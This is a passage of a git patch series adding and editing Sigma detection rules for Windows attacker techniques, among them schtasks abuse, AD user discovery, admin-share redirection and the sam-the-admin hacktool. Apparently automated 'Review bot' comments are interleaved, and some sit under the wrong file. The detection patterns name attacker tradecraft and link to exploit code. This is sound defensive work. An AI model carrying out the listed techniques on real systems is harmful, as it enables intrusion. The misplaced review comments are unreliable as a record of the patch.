+ - '\Windows\ExploitGuard'
condition: all of schtasks_*
falsepositives:
- Unknown
diff --git a/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type.yml b/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type.yml
index e34973df4..6ffa9e601 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type.yml
@@ -1,15 +1,19 @@
-title: Suspicious Schtasks Schedule Type
-id: 7a02e22e-b885-4404-b38b-1ddc7e65258a
-description: Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type
+title: Suspicious Schtasks Schedule Types
+id: 24c8392b-aa3c-46b7-a545-43f71657fe98
+related:
+ - id: 7a02e22e-b885-4404-b38b-1ddc7e65258a
+ type: similar
+description: Detects scheduled task creations or modification on a suspicious schedule type
status: experimental
references:
- https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change
- https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create
+ - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html
tags:
- attack.execution
- attack.t1053.005
author: Nasreddine Bencherchali
-date: 2022/08/31
+date: 2022/09/09
logsource:
product: windows
category: process_creation
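Review bot: In the `proc_creation_win_susp_schtasks_schedule_type.yml` hunk the creation date is overwritten (`-date: 2022/08/31` / `+date: 2022/09/09`) on a file that already exists; elsewhere in this patch edits to existing rules keep `date` and add `modified`, so this should be `date: 2022/08/31` plus `modified: 2022/09/09`. The same hunk re-assigns the rule's `id`, which consumers that key on ids will see as a new rule; from the `related` entry and the new `_system` file it appears the old id is deliberately moved to the rule that keeps the original privileged-task semantics, which is reasonable, but a comment next to `related:` such as `# id 7a02e22e... now lives in the *_schedule_type_system rule, which keeps the original privileged-task logic` would make that intent explicit. The remainder of this file's detection block is outside the hunk.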
@@ -23,12 +27,12 @@ detection:
- ' ONSTART '
- ' ONCE '
- ' ONIDLE '
- selection_privs:
+ filter_privs:
CommandLine|contains:
- 'NT AUT' # This covers the usual NT AUTHORITY\SYSTEM
- ' SYSTEM' # SYSTEM is a valid value for schtasks hence it gets it's own value with space
- 'HIGHEST'
- condition: all of selection_*
+ condition: all of selection_* and not 1 of filter_*
falsepositives:
- - Unknown
+ - Legitmate processes that run at logon. Filter according to your environment
level: high
diff --git a/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type_system.yml b/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type_system.yml
new file mode 100644
index 000000000..b2fc3c9a1
--- /dev/null
+++ b/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type_system.yml
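Review bot: The new `falsepositives` entry misspells "Legitimate" as `Legitmate`; the same misspelling appears in the new `proc_creation_win_wevtutil_recon.yml` and `registry_set_winlogon_allow_multiple_tssessions.yml` files later in this patch. Suggest `- Legitimate processes that run at logon. Filter according to your environment`. Note also that `filter_privs` is now a negated filter, so any command line containing ` SYSTEM` or `HIGHEST` anywhere (a task name or path, not only the `/RU` and `/RL` arguments) is excluded from this rule and is expected to be caught by the privileged-variant rule instead; a comment on `filter_privs:` stating that hand-off, e.g. `# Privileged variants are excluded here and covered by the *_schedule_type_system rule`, would prevent a later tightening that re-introduces overlap between the two.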
@@ -0,0 +1,37 @@
+title: Suspicious Schtasks Schedule Type With High Privileges
+id: 7a02e22e-b885-4404-b38b-1ddc7e65258a
+related:
+ - id: 24c8392b-aa3c-46b7-a545-43f71657fe98
+ type: similar
+description: Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type
+status: experimental
+references:
+ - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change
+ - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create
+tags:
+ - attack.execution
+ - attack.t1053.005
+author: Nasreddine Bencherchali
+date: 2022/08/31
+logsource:
+ product: windows
+ category: process_creation
+detection:
+ selection_img:
+ - Image|endswith: '\schtasks.exe'
+ - OriginalFileName: 'schtasks.exe'
+ selection_time:
+ CommandLine|contains:
+ - ' ONLOGON '
+ - ' ONSTART '
+ - ' ONCE '
+ - ' ONIDLE '
+ selection_privs:
+ CommandLine|contains:
+ - 'NT AUT' # This covers the usual NT AUTHORITY\SYSTEM
+ - ' SYSTEM' # SYSTEM is a valid value for schtasks hence it gets it's own value with space
+ - 'HIGHEST'
+ condition: all of selection_*
+falsepositives:
+ - Some installers were seen using this method of creation unfortunately. Filter them in your environment
+level: high
diff --git a/rules/windows/process_creation/proc_creation_win_user_discovery_get_aduser.yml b/rules/windows/process_creation/proc_creation_win_user_discovery_get_aduser.yml
new file mode 100644
index 000000000..4e91b6925
--- /dev/null
+++ b/rules/windows/process_creation/proc_creation_win_user_discovery_get_aduser.yml
@@ -0,0 +1,30 @@
+title: User Discovery Via Get-ADUser Cmdlet
+id: c2993223-6da8-4b1a-88ee-668b8bf315e9
+status: experimental
+description: Detects usage of the Get-ADUser cmdlet to collect user information
+author: Nasreddine Bencherchali
+references:
+ - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html
+date: 2022/09/09
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection_img:
+ - Image|endswith:
+ - '\powershell.exe'
+ - '\pwsh.exe'
+ - OriginalFileName:
+ - 'PowerShell.EXE'
+ - 'pwsh.dll'
+ selection_cli:
+ CommandLine|contains|all:
+ - 'Get-ADUser '
+ - ' -Filter \*'
+ condition: all of selection
+falsepositives:
+ - Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often
+level: high
+tags:
+ - attack.discovery
+ - attack.t1033
diff --git a/rules/windows/process_creation/proc_creation_win_wevtutil_recon.yml b/rules/windows/process_creation/proc_creation_win_wevtutil_recon.yml
new file mode 100644
index 000000000..021e770a3
--- /dev/null
+++ b/rules/windows/process_creation/proc_creation_win_wevtutil_recon.yml
@@ -0,0 +1,28 @@
+title: Wevtutil Recon
+id: beaa66d6-aa1b-4e3c-80f5-e0145369bfaf
+status: experimental
+description: Detects usage of the wevtutil utility to perform reconnaissance
+references:
+ - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html
+author: Nasreddine Bencherchali
+date: 2022/09/09
+tags:
+ - attack.discovery
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection_cli:
+ Image|endswith: '\wevtutil.exe'
+ CommandLine|contains:
+ - ' qe '
+ - ' query-events '
+ selection_logs:
+ CommandLine|contains:
+ # Add more event log channels that are interesting for attackers
+ - 'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational'
+ - 'Microsoft-Windows-Terminal-Services-RemoteConnectionManager/Operational'
+ condition: all of selection_*
+falsepositives:
+ - Legitmate usage of the utility by administrators to query the event log
+level: medium
diff --git a/rules/windows/registry/registry_event/registry_event_net_ntlm_downgrade.yml b/rules/windows/registry/registry_event/registry_event_net_ntlm_downgrade.yml
index 0e70d3dfd..c275f908c 100644
--- a/rules/windows/registry/registry_event/registry_event_net_ntlm_downgrade.yml
+++ b/rules/windows/registry/registry_event/registry_event_net_ntlm_downgrade.yml
@@ -16,7 +16,7 @@ logsource:
category: registry_event
detection:
selection:
- TargetObject|contains|all:
+ TargetObject|contains|all:
- 'SYSTEM\'
- 'ControlSet'
- '\Control\Lsa'
@@ -27,4 +27,4 @@ detection:
condition: selection
falsepositives:
- Unknown
-level: high
\ No newline at end of file
+level: high
diff --git a/rules/windows/registry/registry_set/registry_set_disable_system_restore.yml b/rules/windows/registry/registry_set/registry_set_disable_system_restore.yml
index b7cf6a8f1..5e3e00f86 100644
--- a/rules/windows/registry/registry_set/registry_set_disable_system_restore.yml
+++ b/rules/windows/registry/registry_set/registry_set_disable_system_restore.yml
@@ -3,7 +3,7 @@ id: 5de03871-5d46-4539-a82d-3aa992a69a83
description: Detects the modification of the registry to disable a system restore on the computer
author: frack113
date: 2022/04/04
-modified: 2022/06/26
+modified: 2022/09/09
status: experimental
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-9---disable-system-restore-through-registry
@@ -13,9 +13,9 @@ logsource:
detection:
selection:
EventType: Setvalue
- TargetObject|startswith:
- - 'HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore'
- - 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore'
+ TargetObject|contains:
+ - '\Policies\Microsoft\Windows NT\SystemRestore'
+ - '\Microsoft\Windows NT\CurrentVersion\SystemRestore'
TargetObject|endswith:
- DisableConfig
- DisableSR
diff --git a/rules/windows/registry/registry_set/registry_set_enabling_turnoffcheck.yml b/rules/windows/registry/registry_set/registry_set_enabling_turnoffcheck.yml
index 3c0451ff3..5fe588e2a 100644
--- a/rules/windows/registry/registry_set/registry_set_enabling_turnoffcheck.yml
+++ b/rules/windows/registry/registry_set/registry_set_enabling_turnoffcheck.yml
@@ -2,6 +2,7 @@ title: Scripted Diagnostics Turn Off Check Enabled - Registry
id: 7d995e63-ec83-4aa3-89d5-8a17b5c87c86
description: Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability
date: 2022/06/15
+modified: 2022/09/09
author: 'Christopher Peacock @securepeacock, SCYTHE @scythe_io'
references:
- https://twitter.com/wdormann/status/1537075968568877057?s=20&t=0lr18OAnmAGoGpma6grLUw
@@ -12,7 +13,7 @@ logsource:
detection:
selection:
EventType: SetValue
- TargetObject: 'HKLM\SOFTWARE\Policies\Microsoft\Windows\ScriptedDiagnostics\TurnOffCheck'
+ TargetObject|endswith: '\Policies\Microsoft\Windows\ScriptedDiagnostics\TurnOffCheck'
Details: 'DWORD (0x00000001)'
condition: selection
falsepositives:
diff --git a/rules/windows/registry/registry_set/registry_set_hide_function_user.yml b/rules/windows/registry/registry_set/registry_set_hide_function_user.yml
index 684ed8672..d96729b30 100644
--- a/rules/windows/registry/registry_set/registry_set_hide_function_user.yml
+++ b/rules/windows/registry/registry_set/registry_set_hide_function_user.yml
@@ -18,7 +18,7 @@ detection:
- 'SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\HideSCAHealth'
- 'SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\HideSCANetwork'
- 'SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\HideSCAPower'
- - 'Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\HideSCAVolume'
+ - 'SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\HideSCAVolume'
Details: 'DWORD (0x00000001)'
selection_set_0:
EventType: SetValue
diff --git a/rules/windows/registry/registry_set/registry_set_install_root_or_ca_certificat.yml b/rules/windows/registry/registry_set/registry_set_install_root_or_ca_certificat.yml
index 74a990b86..8da757bce 100644
--- a/rules/windows/registry/registry_set/registry_set_install_root_or_ca_certificat.yml
+++ b/rules/windows/registry/registry_set/registry_set_install_root_or_ca_certificat.yml
@@ -21,7 +21,7 @@ detection:
- '\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\'
- '\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates\'
- '\SOFTWARE\Microsoft\EnterpriseCertificates\CA\Certificates\'
- - '\Software\Microsoft\SystemCertificates\AuthRoot\Certificates\'
+ - '\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\'
- '\SOFTWARE\Policies\Microsoft\SystemCertificates\AuthRoot\Certificates\'
- '\SOFTWARE\Microsoft\EnterpriseCertificates\AuthRoot\Certificates\'
TargetObject|endswith: '\Blob'
diff --git a/rules/windows/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml b/rules/windows/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml
new file mode 100644
index 000000000..4fb70441a
--- /dev/null
+++ b/rules/windows/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml
@@ -0,0 +1,22 @@
+title: Winlogon AllowMultipleTSSessions Enable
+id: f7997770-92c3-4ec9-b112-774c4ef96f96
+description: Detects when the 'AllowMultipleTSSessions' value is enabled. Which allows for multiple Remote Desktop connection sessions to be opened at once. This is often used by attacker as a way to connect to an RDP session without disconnecting the other users
+author: Nasreddine Bencherchali
+date: 2022/09/09
+status: experimental
+references:
+ - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html
+logsource:
+ category: registry_set
+ product: windows
+detection:
+ selection:
+ EventType: SetValue
+ TargetObject|endswith: '\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions'
+ Details|endswith: DWORD (0x00000001)
+ condition: selection
+falsepositives:
+ - Legitmate use of the multi session functionality
+level: medium
+tags:
+ - attack.persistence
From c8fc1cf21e6a991cb32da1f05a899ed63ccd8eae Mon Sep 17 00:00:00 2001
From: "nasreddine.bencherchali@nextron-systems.com" <8741929+nasbench@users.noreply.github.com>
Date: Fri, 9 Sep 2022 15:04:36 +0200
Subject: [PATCH 49/73] Update proc_creation_win_user_discovery_get_aduser.yml
---
.../proc_creation_win_user_discovery_get_aduser.yml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/rules/windows/process_creation/proc_creation_win_user_discovery_get_aduser.yml b/rules/windows/process_creation/proc_creation_win_user_discovery_get_aduser.yml
index 4e91b6925..6e5505cdf 100644
--- a/rules/windows/process_creation/proc_creation_win_user_discovery_get_aduser.yml
+++ b/rules/windows/process_creation/proc_creation_win_user_discovery_get_aduser.yml
@@ -21,7 +21,7 @@ detection:
CommandLine|contains|all:
- 'Get-ADUser '
- ' -Filter \*'
- condition: all of selection
+ condition: all of selection_*
falsepositives:
- Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often
level: high
From 051397b533b3a0f8e01c836319ca6b47c63ff915 Mon Sep 17 00:00:00 2001
From: "nasreddine.bencherchali@nextron-systems.com" <8741929+nasbench@users.noreply.github.com>
Date: Fri, 9 Sep 2022 15:10:49 +0200
Subject: [PATCH 50/73] Update proc_creation_win_susp_schtasks_delete_all.yml
---
.../proc_creation_win_susp_schtasks_delete_all.yml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete_all.yml b/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete_all.yml
index 28aefc946..f36952ecd 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete_all.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete_all.yml
@@ -14,7 +14,7 @@ detection:
Image|endswith: '\schtasks.exe'
CommandLine|contains|all:
- ' /delete '
- - '/tn *'
+ - '/tn \*'
- ' /f'
condition: selection
falsepositives:
From b75fb5abf5efa9601bf5c02577f7433dfbca5767 Mon Sep 17 00:00:00 2001
From: David ANDRE
Date: Fri, 9 Sep 2022 15:12:47 +0200
Subject: [PATCH 51/73] Renamed suspicious in rules file names to susp
---
...uspicious_psexesvc.yml => proc_creation_win_susp_psexesvc.yml} | 0
...s_system.yml => proc_creation_win_susp_psexesvc_as_system.yml} | 0
...vc_renamed.yml => proc_creation_win_susp_psexesvc_renamed.yml} | 0
3 files changed, 0 insertions(+), 0 deletions(-)
rename rules/windows/process_creation/{proc_creation_win_suspicious_psexesvc.yml => proc_creation_win_susp_psexesvc.yml} (100%)
rename rules/windows/process_creation/{proc_creation_win_suspicious_psexesvc_as_system.yml => proc_creation_win_susp_psexesvc_as_system.yml} (100%)
rename rules/windows/process_creation/{proc_creation_win_suspicious_psexesvc_renamed.yml => proc_creation_win_susp_psexesvc_renamed.yml} (100%)
diff --git a/rules/windows/process_creation/proc_creation_win_suspicious_psexesvc.yml b/rules/windows/process_creation/proc_creation_win_susp_psexesvc.yml
similarity index 100%
rename from rules/windows/process_creation/proc_creation_win_suspicious_psexesvc.yml
rename to rules/windows/process_creation/proc_creation_win_susp_psexesvc.yml
diff --git a/rules/windows/process_creation/proc_creation_win_suspicious_psexesvc_as_system.yml b/rules/windows/process_creation/proc_creation_win_susp_psexesvc_as_system.yml
similarity index 100%
rename from rules/windows/process_creation/proc_creation_win_suspicious_psexesvc_as_system.yml
rename to rules/windows/process_creation/proc_creation_win_susp_psexesvc_as_system.yml
diff --git a/rules/windows/process_creation/proc_creation_win_suspicious_psexesvc_renamed.yml b/rules/windows/process_creation/proc_creation_win_susp_psexesvc_renamed.yml
similarity index 100%
rename from rules/windows/process_creation/proc_creation_win_suspicious_psexesvc_renamed.yml
rename to rules/windows/process_creation/proc_creation_win_susp_psexesvc_renamed.yml
From a71ce185d791427a2b29d66a4cb5b83b5c6619e4 Mon Sep 17 00:00:00 2001
From: "nasreddine.bencherchali@nextron-systems.com" <8741929+nasbench@users.noreply.github.com>
Date: Fri, 9 Sep 2022 15:32:03 +0200
Subject: [PATCH 52/73] Fix
---
.../proc_creation_win_apt_hurricane_panda.yml | 2 +-
...reation_win_redirect_local_admin_share.yml | 29 +++++++++----------
...ation_win_susp_redir_local_admin_share.yml | 21 --------------
3 files changed, 14 insertions(+), 38 deletions(-)
delete mode 100644 rules/windows/process_creation/proc_creation_win_susp_redir_local_admin_share.yml
diff --git a/rules/windows/process_creation/proc_creation_win_apt_hurricane_panda.yml b/rules/windows/process_creation/proc_creation_win_apt_hurricane_panda.yml
index 5859e1083..2f51e4fc7 100755
--- a/rules/windows/process_creation/proc_creation_win_apt_hurricane_panda.yml
+++ b/rules/windows/process_creation/proc_creation_win_apt_hurricane_panda.yml
@@ -15,7 +15,7 @@ detection:
- CommandLine|contains|all:
- 'localgroup'
- 'admin'
- - ''
+ - '/add'
- CommandLine|contains:
- '\Win64.exe'
condition: selection
diff --git a/rules/windows/process_creation/proc_creation_win_redirect_local_admin_share.yml b/rules/windows/process_creation/proc_creation_win_redirect_local_admin_share.yml
index bbb5763ce..31b705f94 100644
--- a/rules/windows/process_creation/proc_creation_win_redirect_local_admin_share.yml
+++ b/rules/windows/process_creation/proc_creation_win_redirect_local_admin_share.yml
@@ -1,26 +1,23 @@
-title: Suspicious Redirect To Local Admin Share
-id: 77d570aa-4e72-4949-98ff-24cdeec16787
+title: Suspicious Redirection to Local Admin Share
+id: ab9e3b40-0c85-4ba1-aede-455d226fd124
status: experimental
-description: Detects output redirection to the local admin share (ADMIN$) via the commandline
-author: Nasreddine Bencherchali
+description: Detects a suspicious output redirection to the local admins share, this technique is often found in malicious scripts or hacktool stagers
+author: Florian Roth
+date: 2022/01/16
+modified: 2022/09/09
references:
+ - https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/
- http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html
-date: 2022/09/09
-tags:
- - attack.execution
- - attack.lateral_movement
- - attack.t1021.001
logsource:
category: process_creation
product: windows
detection:
- selection:
- CommandLine|contains:
- - ' 1 > \\\\127.0.0.1\ADMIN$\'
- - ' 1> \\\\127.0.0.1\ADMIN$\'
- - ' 1 >\\\\127.0.0.1\ADMIN$\'
- - ' 1>\\\\127.0.0.1\ADMIN$\'
- condition: selection
+ selection_redirect:
+ CommandLine|contains: '>'
+ selection_share:
+ - '\\\\127.0.0.1\\admin$\\'
+ - '\\\\localhost\\admin$\\'
+ condition: all of selection_*
falsepositives:
- Unknown
level: high
diff --git a/rules/windows/process_creation/proc_creation_win_susp_redir_local_admin_share.yml b/rules/windows/process_creation/proc_creation_win_susp_redir_local_admin_share.yml
deleted file mode 100644
index 040477109..000000000
--- a/rules/windows/process_creation/proc_creation_win_susp_redir_local_admin_share.yml
+++ /dev/null
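Review bot: `selection_share` in the rewritten rule is a bare list of strings with no field, which in Sigma is a keyword (full-text) search rather than a `CommandLine` match; that is inconsistent with `selection_redirect` and with both earlier versions of this rule, and backends that do not support keyword searches on process_creation will either reject the rule or match the share path against every field. Bind it by adding `CommandLine|contains:` as the key under `selection_share:` and indenting the two share patterns beneath it. Two further regressions are worth a look: the whole `tags` block (`attack.execution`, `attack.lateral_movement`, `attack.t1021.001`) is dropped so the rule now carries no ATT&CK mapping, and splitting `'>'` and the share path into separate selections means the redirect operator no longer has to precede the share, so any command line that merely mentions the admin share and contains a `>` somewhere now matches, which is broader than either the deleted file or the first version of this rule.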
@@ -1,21 +0,0 @@ -title: Suspicious Redirection to Local Admin Share -id: ab9e3b40-0c85-4ba1-aede-455d226fd124 -status: experimental -description: Detects a suspicious output redirection to the local admins share as often found in malicious scripts or hacktool stagers -author: Florian Roth -date: 2022/01/16 -modified: 2022/02/01 -references: - - https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/ -logsource: - category: process_creation - product: windows -detection: - selection: - CommandLine|contains: - - '> \\\\127.0.0.1\\admin$' - - '> \\\\localhost\\admin$' - condition: selection -falsepositives: - - Unknown -level: high From 14db9c9fb18d703769779d06f9258b6cfda049d6 Mon Sep 17 00:00:00 2001 From: "nasreddine.bencherchali@nextron-systems.com" <8741929+nasbench@users.noreply.github.com> Date: Fri, 9 Sep 2022 15:43:07 +0200 Subject: [PATCH 53/73] Update proc_creation_win_wmic_computersystem_recon.yml --- .../proc_creation_win_wmic_computersystem_recon.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_wmic_computersystem_recon.yml b/rules/windows/process_creation/proc_creation_win_wmic_computersystem_recon.yml index a78ba6588..645bf62ec 100644 --- a/rules/windows/process_creation/proc_creation_win_wmic_computersystem_recon.yml +++ b/rules/windows/process_creation/proc_creation_win_wmic_computersystem_recon.yml @@ -1,5 +1,5 @@ title: Suspicious Get Local Groups Information with WMIC -id: 164eda96-11b2-430b-85ff-6a265c15bf32 +id: 9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f status: experimental description: Detects execution of wmic utility with the "computersystem" flag in order to obtain information about the machine such as the domain, username, model...etc. references: From b170af5687aab9765306ec73efb0c22d4761522d Mon Sep 17 00:00:00 2001 
From: David ANDRE Date: Fri, 9 Sep 2022 16:08:19 +0200 Subject: [PATCH 54/73] Added rule for sam the admin suspicious computer --- .../security/win_susp_computer_name.yml | 35 +++++++++++++++++++ .../file_change_win_2022_timestomping.yml | 4 +-- 2 files changed, 37 insertions(+), 2 deletions(-) create mode 100644 rules/windows/builtin/security/win_susp_computer_name.yml diff --git a/rules/windows/builtin/security/win_susp_computer_name.yml b/rules/windows/builtin/security/win_susp_computer_name.yml new file mode 100644 index 000000000..e85500077 --- /dev/null +++ b/rules/windows/builtin/security/win_susp_computer_name.yml @@ -0,0 +1,35 @@ +title: Win Susp Computer Name containing samtheadmin +id: 39698b3f-da92-4bc6-bfb5-645a98386e45 +status: experimental +description: Detects suspicious computer name +author: elhoim +date: 2022/09/09 +references: + - https://twitter.com/malmoeb/status/1511760068743766026 + - https://github.com/WazeHell/sam-theadmin/blob/main/sam_the_admin.py + - https://github.com/helloexp/0day/blob/614227a7b9beb0e91e7e2c6a5e532e6f7a8e883c/00-CVE_EXP/CVE-2021-42287/sam-the-admin/sam_the_admin.py +tags: + - cve.2021.42278 + - cve.2021.42287 + - attack.persistence + - attack.privilege_escalation + - attack.t1078 +logsource: + category: security + product: windows +detection: + selection1: + SamAccountName|startswith: 'SAMTHEADMIN-' + SamAccountName|endswith: '$' + selection2: + TargetUserName|startswith: 'SAMTHEADMIN-' + TargetUserName|endswith: '$' + condition: 1 of selection* + fields: + - EventID + - SamAccountName + - SubjectUserName + - TargetUserName +falsepositives: + - Unknown +level: critical diff --git a/rules/windows/file_change/file_change_win_2022_timestomping.yml b/rules/windows/file_change/file_change_win_2022_timestomping.yml index cfdf05658..0a2643eaf 100644 --- a/rules/windows/file_change/file_change_win_2022_timestomping.yml +++ b/rules/windows/file_change/file_change_win_2022_timestomping.yml 
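Review bot: The logsource uses `category: security`, but the Windows Security event log is addressed in Sigma as a service, not a category; without `service: security` the log-source mapping in backend configurations will not resolve and the rule will not compile to the intended channel. Change the block to `logsource:` / `  product: windows` / `  service: security`. Separately, `fields:` is indented under `detection:`, so it is parsed as a detection item rather than the top-level fields list; this is corrected later in the series by [PATCH 58/73].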
@@ -8,7 +8,7 @@ references: - https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html author: frack113, Florian Roth date: 2022/08/12 -modified: 2022/09/05 +modified: 2022/09/09 tags: - attack.t1070.006 - attack.defense_evasion @@ -33,7 +33,7 @@ detection: - TargetFilename|endswith: - '.tmp' - '.temp' - condition: ( selection1 and not filter1 ) or ( selection2 and not filter2 ) and not 1 of gen_filter* + condition: (( selection1 and not filter1 ) or ( selection2 and not filter2 )) and not 1 of gen_filter* falsepositives: - Changes made to or by the local NTP service level: high From 9a77542bc6dc85805ab10e7cc6ee9500f09ff9e4 Mon Sep 17 00:00:00 2001 From: David ANDRE Date: Fri, 9 Sep 2022 16:11:07 +0200 Subject: [PATCH 55/73] Add comment to explain lack of eventID\nBetter description --- rules/windows/builtin/security/win_susp_computer_name.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/windows/builtin/security/win_susp_computer_name.yml b/rules/windows/builtin/security/win_susp_computer_name.yml index e85500077..f28ddfb24 100644 --- a/rules/windows/builtin/security/win_susp_computer_name.yml +++ b/rules/windows/builtin/security/win_susp_computer_name.yml @@ -1,7 +1,7 @@ title: Win Susp Computer Name containing samtheadmin id: 39698b3f-da92-4bc6-bfb5-645a98386e45 status: experimental -description: Detects suspicious computer name +description: Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool author: elhoim date: 2022/09/09 references: @@ -18,6 +18,7 @@ logsource: category: security product: windows detection: + # Not adding an EventID on purpose to try to match on any event in security (including use of account), not just 4741 (computer account created) selection1: SamAccountName|startswith: 'SAMTHEADMIN-' SamAccountName|endswith: '$' From 6182b43279f7346250c68d5b0137833c04a5a22f Mon Sep 17 00:00:00 2001 
From: David ANDRE Date: Fri, 9 Sep 2022 16:40:17 +0200 Subject: [PATCH 56/73] Add rule for renamed vmnat.exe --- .../proc_creation_win_renamed_vmnat.yml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml diff --git a/rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml b/rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml new file mode 100644 index 000000000..d7f2d8be8 --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml @@ -0,0 +1,23 @@ +title: Proc Creation Win Renamed Vmnat.exe +id: 7b4f794b-590a-4ad4-ba18-7964a2832205 +status: experimental +description: Detects renamed vmnat.exe (Legitimate file from VMware workstation) for DLL side-loading +author: elhoim +date: 2022/09/09 +references: + - https://twitter.com/malmoeb/status/1525901219247845376 +tags: + - attack.defense_evasion + - attack.t1574.002 +logsource: + category: process_creation + product: windows +detection: + selection: + OriginalFileName: 'vmnat.exe' + filter: + Image|endswith: 'vmnat.exe' + condition: selection and not filter +falsepositives: + - Unknown +level: high From 6c1761a7b742cd7fcbde5dc2cfd92db6ebefe062 Mon Sep 17 00:00:00 2001 From: David ANDRE Date: Fri, 9 Sep 2022 16:12:59 +0200 Subject: [PATCH 57/73] Revert "Merge branch 'master' of github.com:elhoim/sigma" This reverts commit fc98278b194aba57181ee70cfb17f522906a55ea. --- .../windows/file_change/file_change_win_2022_timestomping.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/file_change/file_change_win_2022_timestomping.yml b/rules/windows/file_change/file_change_win_2022_timestomping.yml index 0a2643eaf..cfdf05658 100644 --- a/rules/windows/file_change/file_change_win_2022_timestomping.yml +++ b/rules/windows/file_change/file_change_win_2022_timestomping.yml 
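Review bot: The filter `Image|endswith: 'vmnat.exe'` is not anchored to a path separator, so any image whose name merely ends in that string would be excluded from detection while the `OriginalFileName: 'vmnat.exe'` selection is still satisfied. Anchoring it as `Image|endswith: '\vmnat.exe'` limits the exclusion to the actual file name and matches the convention used elsewhere in this series, e.g. `Image|endswith: '\net.exe'`.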
@@ -8,7 +8,7 @@ references: - https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html author: frack113, Florian Roth date: 2022/08/12 -modified: 2022/09/09 +modified: 2022/09/05 tags: - attack.t1070.006 - attack.defense_evasion @@ -33,7 +33,7 @@ detection: - TargetFilename|endswith: - '.tmp' - '.temp' - condition: (( selection1 and not filter1 ) or ( selection2 and not filter2 )) and not 1 of gen_filter* + condition: ( selection1 and not filter1 ) or ( selection2 and not filter2 ) and not 1 of gen_filter* falsepositives: - Changes made to or by the local NTP service level: high From b9cc206d9d67c7a9a4be66cf605cf8f1d04a8d93 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Fri, 9 Sep 2022 18:53:48 +0200 Subject: [PATCH 58/73] Update win_susp_computer_name.yml --- .../builtin/security/win_susp_computer_name.yml | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/rules/windows/builtin/security/win_susp_computer_name.yml b/rules/windows/builtin/security/win_susp_computer_name.yml index f28ddfb24..285be837e 100644 --- a/rules/windows/builtin/security/win_susp_computer_name.yml +++ b/rules/windows/builtin/security/win_susp_computer_name.yml @@ -1,4 +1,4 @@ -title: Win Susp Computer Name containing samtheadmin +title: Win Susp Computer Name Containing Samtheadmin id: 39698b3f-da92-4bc6-bfb5-645a98386e45 status: experimental description: Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool @@ -26,11 +26,11 @@ detection: TargetUserName|startswith: 'SAMTHEADMIN-' TargetUserName|endswith: '$' condition: 1 of selection* - fields: - - EventID - - SamAccountName - - SubjectUserName - - TargetUserName +fields: + - EventID + - SamAccountName + - SubjectUserName + - TargetUserName falsepositives: - - Unknown + - Unknown level: critical From 3396414bdab26b35ea960e806f39fb18f2edc667 Mon Sep 17 